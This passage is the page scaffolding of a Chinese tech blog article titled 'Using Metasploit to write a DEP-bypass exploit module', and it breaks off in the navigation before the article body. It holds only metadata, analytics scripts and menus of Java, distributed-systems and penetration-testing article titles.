<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>使用Metasploit编写绕过DEP渗透模块 | 冰河技术</title>
    <meta name="generator" content="VuePress 1.9.7">
    <link rel="icon" href="/favicon.ico">
    <script charset="utf-8" async="async" src="/js/jquery.min.js"></script>
    <script charset="utf-8" async="async" src="/js/global.js"></script>
    <script charset="utf-8" async="async" src="/js/fingerprint2.min.js"></script>
    <script charset="utf-8" async="async" src="https://v1.cnzz.com/z_stat.php?id=1281063564&amp;web_id=1281063564"></script>
    <script charset="utf-8" async="async" src="https://s9.cnzz.com/z_stat.php?id=1281064551&amp;web_id=1281064551"></script>
    <script>
            var _hmt = _hmt || [];
            (function() {
              var hm = document.createElement("script");
              hm.src = "https://hm.baidu.com/hm.js?d091d2fd0231588b1d0f9231e24e3f5e";
              var s = document.getElementsByTagName("script")[0];
              s.parentNode.insertBefore(hm, s);
            })();
            </script>
    <meta name="description" content="包含：编程语言，开发技术，分布式，微服务，高并发，高可用，高可扩展，高可维护，JVM技术，MySQL，分布式数据库，分布式事务，云原生，大数据，云计算，渗透技术，各种面试题，面试技巧...">
    <meta property="article:modified_time" content="2022-05-23T11:30:51.000Z">
    <meta property="og:title" content="使用Metasploit编写绕过DEP渗透模块">
    <meta property="og:type" content="article">
    <meta property="og:url" content="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html">
    <meta name="twitter:title" content="使用Metasploit编写绕过DEP渗透模块">
    <meta name="twitter:url" content="/md/hack/tools/2022-04-17-025-%E4%BD%BF%E7%94%A8Metasploit%E7%BC%96%E5%86%99%E7%BB%95%E8%BF%87DEP%E6%B8%97%E9%80%8F%E6%A8%A1%E5%9D%97.html">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="robots" content="all">
    <meta name="author" content="冰河">
    <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="0">
    <meta name="keywords" content="冰河，冰河技术, 编程语言，开发技术，分布式，微服务，高并发，高可用，高可扩展，高可维护，JVM技术，MySQL，分布式数据库，分布式事务，云原生，大数据，云计算，渗透技术，各种面试题，面试技巧">
    <meta name="apple-mobile-web-app-capable" content="yes">
    
    <link rel="preload" href="/assets/css/0.styles.ab888ebb.css" as="style"><link rel="preload" href="/assets/css/styles.css?v=1653305936337" as="style"><link rel="preload" href="/assets/js/cg-styles.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-app.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-4.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-3.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-218.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-5.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-6.js?v=1653305936337" as="script">
    <link rel="stylesheet" href="/assets/css/0.styles.ab888ebb.css"><link rel="stylesheet" href="/assets/css/styles.css?v=1653305936337">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="sidebar-button"><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" viewBox="0 0 448 512" class="icon"><path fill="currentColor" d="M436 124H12c-6.627 0-12-5.373-12-12V80c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12z"></path></svg></div> <a href="/" class="home-link router-link-active"><!----> <span class="site-name">冰河技术</span></a> <div class="links"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><div class="nav-item"><a href="/md/other/guide-to-reading.html" class="nav-link">
  导读
</a></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="核心技术" class="dropdown-title"><span class="title">核心技术</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><h4>
          Java核心技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/core/java/basics/2022-04-28-全网最全正则表达式总结.html" class="nav-link">
  Java基础
</a></li><li class="dropdown-subitem"><a href="/md/core/java/advanced/default.html" class="nav-link">
  Java进阶
</a></li><li class="dropdown-subitem"><a href="/md/core/java/senior/default.html" class="nav-link">
  Java高级
</a></li><li class="dropdown-subitem"><a href="/md/core/java/java8/2022-03-31-001-Java8有哪些新特性呢？.html" class="nav-link">
  Java8新特性
</a></li></ul></li><li class="dropdown-item"><h4>
          Spring核心技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/core/spring/ioc/2022-04-04-001-聊聊Spring注解驱动开发那些事儿.html" class="nav-link">
  IOC核心技术
</a></li><li class="dropdown-subitem"><a href="/md/core/spring/aop/default.html" class="nav-link">
  AOP核心技术
</a></li></ul></li><li class="dropdown-item"><h4>
          JVM核心技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/core/jvm/2022-04-18-001-JVM调优的几种场景.html" class="nav-link">
  JVM调优技术
</a></li></ul></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="性能调优" class="dropdown-title"><span class="title">性能调优</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/performance/jvm/default.html" class="nav-link">
  JVM性能调优
</a></li><li class="dropdown-item"><!----> <a href="/md/performance/tomcat/default.html" class="nav-link">
  Tomcat性能调优
</a></li><li class="dropdown-item"><!----> <a href="/md/performance/mysql/default.html" class="nav-link">
  MySQL性能调优
</a></li><li class="dropdown-item"><!----> <a href="/md/performance/system/default.html" class="nav-link">
  操作系统性能调优
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="并发编程" class="dropdown-title"><span class="title">并发编程</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/concurrent/bottom/default.html" class="nav-link">
  底层技术
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/source/2020-03-30-001-一文搞懂线程与多线程.html" class="nav-link">
  源码分析
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/basics/2020-03-30-001-明明中断了线程，却为何不起作用呢？.html" class="nav-link">
  基础案例
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/ActualCombat/default.html" class="nav-link">
  实战案例
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/interview/default.html" class="nav-link">
  面试
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/framework/default.html" class="nav-link">
  系统架构
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="框架源码" class="dropdown-title"><span class="title">框架源码</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/frame/spring/default.html" class="nav-link">
  Spring源码
</a></li><li class="dropdown-item"><!----> <a href="/md/frame/springmvc/default.html" class="nav-link">
  SpringMVC源码
</a></li><li class="dropdown-item"><!----> <a href="/md/frame/mybatis/default.html" class="nav-link">
  MyBatis源码
</a></li><li class="dropdown-item"><!----> <a href="/md/frame/dubbo/default.html" class="nav-link">
  Dubbo源码
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="分布式" class="dropdown-title"><span class="title">分布式</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><h4>
          缓存技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/cache/default.html" class="nav-link">
  Redis
</a></li></ul></li><li class="dropdown-item"><h4>
          服务注册发现
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/zookeeper/default.html" class="nav-link">
  Zookeeper
</a></li></ul></li><li class="dropdown-item"><h4>
          消息中间件
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/mq/rabbitmq/default.html" class="nav-link">
  RabbitMQ
</a></li><li class="dropdown-subitem"><a href="/md/distributed/mq/rocketmq/default.html" class="nav-link">
  RocketMQ
</a></li><li class="dropdown-subitem"><a href="/md/distributed/mq/kafka/default.html" class="nav-link">
  Kafka
</a></li></ul></li><li class="dropdown-item"><h4>
          网络通信
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/netty/default.html" class="nav-link">
  Netty
</a></li></ul></li><li class="dropdown-item"><h4>
          远程调用
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/dubbo/default.html" class="nav-link">
  Dubbo
</a></li></ul></li><li class="dropdown-item"><h4>
          数据库
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/mongodb/default.html" class="nav-link">
  MongoDB
</a></li></ul></li><li class="dropdown-item"><h4>
          搜索引擎
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/es/default.html" class="nav-link">
  ElasticSearch
</a></li></ul></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="微服务" class="dropdown-title"><span class="title">微服务</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/microservices/springboot/default.html" class="nav-link">
  SpringBoot
</a></li><li class="dropdown-item"><!----> <a href="/md/microservices/springcloudalibaba/2022-04-02-SpringCloudAlibaba专栏开篇.html" class="nav-link">
  SpringCloudAlibaba
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="中间件" class="dropdown-title"><span class="title">中间件</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/middleware/bytecode/2022-04-11-001-工作多年的你依然重复做着CRUD-是否接触过这种技术.html" class="nav-link">
  字节码编程
</a></li><li class="dropdown-item"><!----> <a href="/md/middleware/threadpool/default.html" class="nav-link">
  手写线程池
</a></li><li class="dropdown-item"><!----> <a href="/md/middleware/limiter/default.html" class="nav-link">
  分布式限流
</a></li><li class="dropdown-item"><!----> <a href="/md/middleware/independent/default.html" class="nav-link">
  开源项目
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="项目实战" class="dropdown-title"><span class="title">项目实战</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/microservices/springcloudalibaba/2022-04-02-SpringCloudAlibaba专栏开篇.html" class="nav-link">
  SpringCloud Alibaba实战
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="渗透技术" class="dropdown-title"><span class="title">渗透技术</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/hack/environment/2022-04-17-001-安装Kali系统.html" class="nav-link">
  基础环境篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/tools/2022-04-17-001-使用Easy-Creds工具攻击无线网络.html" class="nav-link">
  渗透工具篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/horse/2022-05-02-001-各种一句话木马大全.html" class="nav-link">
  木马篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/sql/2022-05-02-001-sqli-labs-master下载与安装.html" class="nav-link">
  SQL注入篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/shell/2022-05-02-001-各种解析漏洞拿shell.html" class="nav-link">
  漏洞拿Shell篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/crack/2022-05-02-001-使用rarcrack暴力破解RAR-ZIP-7Z压缩包.html" class="nav-link">
  暴力破解篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/bash/2022-05-02-001-3389脚本开启代码(vbs版).html" class="nav-link">
  渗透脚本篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/raising/2022-05-02-001-数据库提权.html" class="nav-link">
  数据与系统提权篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/client/2022-05-02-001-浏览器渗透.html" class="nav-link">
  客户端渗透篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/sociology/2022-05-02-001-Metasploit之社会工程学工具包.html" class="nav-link">
  社会工程学
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/question/2022-05-02-001-HTTP错误4031禁止访问-执行访问被拒绝.html" class="nav-link">
  问题记录篇
</a></li></ul></div></div><div class="nav-item"><a href="/md/interview/2022-04-18-001-面试必问-聊聊JVM性能调优.html" class="nav-link">
  面试必问系列
</a></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="📚PDF" class="dropdown-title"><span class="title">📚PDF</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><h4>
          出版图书
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/knowledge/book/2022-03-29-深入理解分布式事务.html" class="nav-link">
  《深入理解分布式事务：原理与实战》
</a></li><li class="dropdown-subitem"><a href="/md/knowledge/book/2022-03-29-MySQL技术大全.html" class="nav-link">
  《MySQL技术大全：开发、优化与运维实战》
</a></li><li class="dropdown-subitem"><a href="/md/knowledge/book/2022-03-29-海量数据处理与大数据技术实战.html" class="nav-link">
  《海量数据处理与大数据技术实战》
</a></li></ul></li><li class="dropdown-item"><h4>
          电子书籍
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/knowledge/pdf/2022-03-30-《冰河的渗透实战笔记》电子书，442页，37万字，正式发布.html" class="nav-link">
  冰河的渗透实战笔记
</a></li></ul></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="关于" class="dropdown-title"><span class="title">关于</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/about/me/about-me.html" class="nav-link">
  关于自己
</a></li><li class="dropdown-item"><!----> <a href="/md/about/study/default.html" class="nav-link">
  关于学习
</a></li><li class="dropdown-item"><!----> <a href="/md/about/job/default.html" class="nav-link">
  关于职场
</a></li></ul></div></div><div class="nav-item"><a href="https://space.bilibili.com/517638832" target="_blank" rel="noopener noreferrer" class="nav-link external">
  B站
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div><div class="nav-item"><a href="https://github.com/binghe001/BingheGuide" target="_blank" rel="noopener noreferrer" class="nav-link external">
  Github
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div> <!----></nav></div></header> <div class="sidebar-mask"></div> <aside class="sidebar"><nav class="nav-links"><div class="nav-item"><a href="/md/other/guide-to-reading.html" class="nav-link">
  导读
</a></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="核心技术" class="dropdown-title"><span class="title">核心技术</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><h4>
          Java核心技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/core/java/basics/2022-04-28-全网最全正则表达式总结.html" class="nav-link">
  Java基础
</a></li><li class="dropdown-subitem"><a href="/md/core/java/advanced/default.html" class="nav-link">
  Java进阶
</a></li><li class="dropdown-subitem"><a href="/md/core/java/senior/default.html" class="nav-link">
  Java高级
</a></li><li class="dropdown-subitem"><a href="/md/core/java/java8/2022-03-31-001-Java8有哪些新特性呢？.html" class="nav-link">
  Java8新特性
</a></li></ul></li><li class="dropdown-item"><h4>
          Spring核心技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/core/spring/ioc/2022-04-04-001-聊聊Spring注解驱动开发那些事儿.html" class="nav-link">
  IOC核心技术
</a></li><li class="dropdown-subitem"><a href="/md/core/spring/aop/default.html" class="nav-link">
  AOP核心技术
</a></li></ul></li><li class="dropdown-item"><h4>
          JVM核心技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/core/jvm/2022-04-18-001-JVM调优的几种场景.html" class="nav-link">
  JVM调优技术
</a></li></ul></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="性能调优" class="dropdown-title"><span class="title">性能调优</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/performance/jvm/default.html" class="nav-link">
  JVM性能调优
</a></li><li class="dropdown-item"><!----> <a href="/md/performance/tomcat/default.html" class="nav-link">
  Tomcat性能调优
</a></li><li class="dropdown-item"><!----> <a href="/md/performance/mysql/default.html" class="nav-link">
  MySQL性能调优
</a></li><li class="dropdown-item"><!----> <a href="/md/performance/system/default.html" class="nav-link">
  操作系统性能调优
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="并发编程" class="dropdown-title"><span class="title">并发编程</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/concurrent/bottom/default.html" class="nav-link">
  底层技术
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/source/2020-03-30-001-一文搞懂线程与多线程.html" class="nav-link">
  源码分析
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/basics/2020-03-30-001-明明中断了线程，却为何不起作用呢？.html" class="nav-link">
  基础案例
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/ActualCombat/default.html" class="nav-link">
  实战案例
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/interview/default.html" class="nav-link">
  面试
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/framework/default.html" class="nav-link">
  系统架构
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="框架源码" class="dropdown-title"><span class="title">框架源码</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/frame/spring/default.html" class="nav-link">
  Spring源码
</a></li><li class="dropdown-item"><!----> <a href="/md/frame/springmvc/default.html" class="nav-link">
  SpringMVC源码
</a></li><li class="dropdown-item"><!----> <a href="/md/frame/mybatis/default.html" class="nav-link">
  MyBatis源码
</a></li><li class="dropdown-item"><!----> <a href="/md/frame/dubbo/default.html" class="nav-link">
  Dubbo源码
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="分布式" class="dropdown-title"><span class="title">分布式</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><h4>
          缓存技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/cache/default.html" class="nav-link">
  Redis
</a></li></ul></li><li class="dropdown-item"><h4>
          服务注册发现
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/zookeeper/default.html" class="nav-link">
  Zookeeper
</a></li></ul></li><li class="dropdown-item"><h4>
          消息中间件
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/mq/rabbitmq/default.html" class="nav-link">
  RabbitMQ
</a></li><li class="dropdown-subitem"><a href="/md/distributed/mq/rocketmq/default.html" class="nav-link">
  RocketMQ
</a></li><li class="dropdown-subitem"><a href="/md/distributed/mq/kafka/default.html" class="nav-link">
  Kafka
</a></li></ul></li><li class="dropdown-item"><h4>
          网络通信
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/netty/default.html" class="nav-link">
  Netty
</a></li></ul></li><li class="dropdown-item"><h4>
          远程调用
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/dubbo/default.html" class="nav-link">
  Dubbo
</a></li></ul></li><li class="dropdown-item"><h4>
          数据库
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/mongodb/default.html" class="nav-link">
  MongoDB
</a></li></ul></li><li class="dropdown-item"><h4>
          搜索引擎
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/es/default.html" class="nav-link">
  ElasticSearch
</a></li></ul></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="微服务" class="dropdown-title"><span class="title">微服务</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/microservices/springboot/default.html" class="nav-link">
  SpringBoot
</a></li><li class="dropdown-item"><!----> <a href="/md/microservices/springcloudalibaba/2022-04-02-SpringCloudAlibaba专栏开篇.html" class="nav-link">
  SpringCloudAlibaba
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="中间件" class="dropdown-title"><span class="title">中间件</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/middleware/bytecode/2022-04-11-001-工作多年的你依然重复做着CRUD-是否接触过这种技术.html" class="nav-link">
  字节码编程
</a></li><li class="dropdown-item"><!----> <a href="/md/middleware/threadpool/default.html" class="nav-link">
  手写线程池
</a></li><li class="dropdown-item"><!----> <a href="/md/middleware/limiter/default.html" class="nav-link">
  分布式限流
</a></li><li class="dropdown-item"><!----> <a href="/md/middleware/independent/default.html" class="nav-link">
  开源项目
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="项目实战" class="dropdown-title"><span class="title">项目实战</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/microservices/springcloudalibaba/2022-04-02-SpringCloudAlibaba专栏开篇.html" class="nav-link">
  SpringCloud Alibaba实战
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="渗透技术" class="dropdown-title"><span class="title">渗透技术</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/hack/environment/2022-04-17-001-安装Kali系统.html" class="nav-link">
  基础环境篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/tools/2022-04-17-001-使用Easy-Creds工具攻击无线网络.html" class="nav-link">
  渗透工具篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/horse/2022-05-02-001-各种一句话木马大全.html" class="nav-link">
  木马篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/sql/2022-05-02-001-sqli-labs-master下载与安装.html" class="nav-link">
  SQL注入篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/shell/2022-05-02-001-各种解析漏洞拿shell.html" class="nav-link">
  漏洞拿Shell篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/crack/2022-05-02-001-使用rarcrack暴力破解RAR-ZIP-7Z压缩包.html" class="nav-link">
  暴力破解篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/bash/2022-05-02-001-3389脚本开启代码(vbs版).html" class="nav-link">
  渗透脚本篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/raising/2022-05-02-001-数据库提权.html" class="nav-link">
  数据与系统提权篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/client/2022-05-02-001-浏览器渗透.html" class="nav-link">
  客户端渗透篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/sociology/2022-05-02-001-Metasploit之社会工程学工具包.html" class="nav-link">
  社会工程学
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/question/2022-05-02-001-HTTP错误4031禁止访问-执行访问被拒绝.html" class="nav-link">
  问题记录篇
</a></li></ul></div></div><div class="nav-item"><a href="/md/interview/2022-04-18-001-面试必问-聊聊JVM性能调优.html" class="nav-link">
  面试必问系列
</a></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="📚PDF" class="dropdown-title"><span class="title">📚PDF</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><h4>
          出版图书
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/knowledge/book/2022-03-29-深入理解分布式事务.html" class="nav-link">
  《深入理解分布式事务：原理与实战》
</a></li><li class="dropdown-subitem"><a href="/md/knowledge/book/2022-03-29-MySQL技术大全.html" class="nav-link">
  《MySQL技术大全：开发、优化与运维实战》
</a></li><li class="dropdown-subitem"><a href="/md/knowledge/book/2022-03-29-海量数据处理与大数据技术实战.html" class="nav-link">
  《海量数据处理与大数据技术实战》
</a></li></ul></li><li class="dropdown-item"><h4>
          电子书籍
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/knowledge/pdf/2022-03-30-《冰河的渗透实战笔记》电子书，442页，37万字，正式发布.html" class="nav-link">
  冰河的渗透实战笔记
</a></li></ul></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="关于" class="dropdown-title"><span class="title">关于</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/about/me/about-me.html" class="nav-link">
  关于自己
</a></li><li class="dropdown-item"><!----> <a href="/md/about/study/default.html" class="nav-link">
  关于学习
</a></li><li class="dropdown-item"><!----> <a href="/md/about/job/default.html" class="nav-link">
  关于职场
</a></li></ul></div></div><div class="nav-item"><a href="https://space.bilibili.com/517638832" target="_blank" rel="noopener noreferrer" class="nav-link external">
  B站
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div><div class="nav-item"><a href="https://github.com/binghe001/BingheGuide" target="_blank" rel="noopener noreferrer" class="nav-link external">
  Github
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div> <!----></nav>  <ul class="sidebar-links"><li><section class="sidebar-group depth-0"><p class="sidebar-heading open"><span>渗透工具篇</span> <!----></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/md/hack/tools/2022-04-17-001-使用Easy-Creds工具攻击无线网络.html" class="sidebar-link">使用Easy-Creds工具攻击无线网络</a></li><li><a href="/md/hack/tools/2022-04-17-002-Nmap+Zenmap+Amap+Zmap.html" class="sidebar-link">Nmap+Zenmap+Amap+Zmap</a></li><li><a href="/md/hack/tools/2022-04-17-003-Zenmap.html" class="sidebar-link">Zenmap</a></li><li><a href="/md/hack/tools/2022-04-17-004-Amap.html" class="sidebar-link">Amap</a></li><li><a href="/md/hack/tools/2022-04-17-005-Zmap.html" class="sidebar-link">Zmap</a></li><li><a href="/md/hack/tools/2022-04-17-006-Nessus的整理.html" class="sidebar-link">Nessus的整理</a></li><li><a href="/md/hack/tools/2022-04-17-007-Burpsuite上传截断及截断原理介绍.html" class="sidebar-link">Burpsuite上传截断及截断原理介绍</a></li><li><a href="/md/hack/tools/2022-04-17-008-Kali2.0Meterpreter运用.html" class="sidebar-link">Kali2.0 Meterpreter 运用</a></li><li><a href="/md/hack/tools/2022-04-17-009-lcx.exe内网转发命令教程-LCX免杀下载.html" class="sidebar-link">lcx.exe内网转发命令教程-LCX免杀下载</a></li><li><a 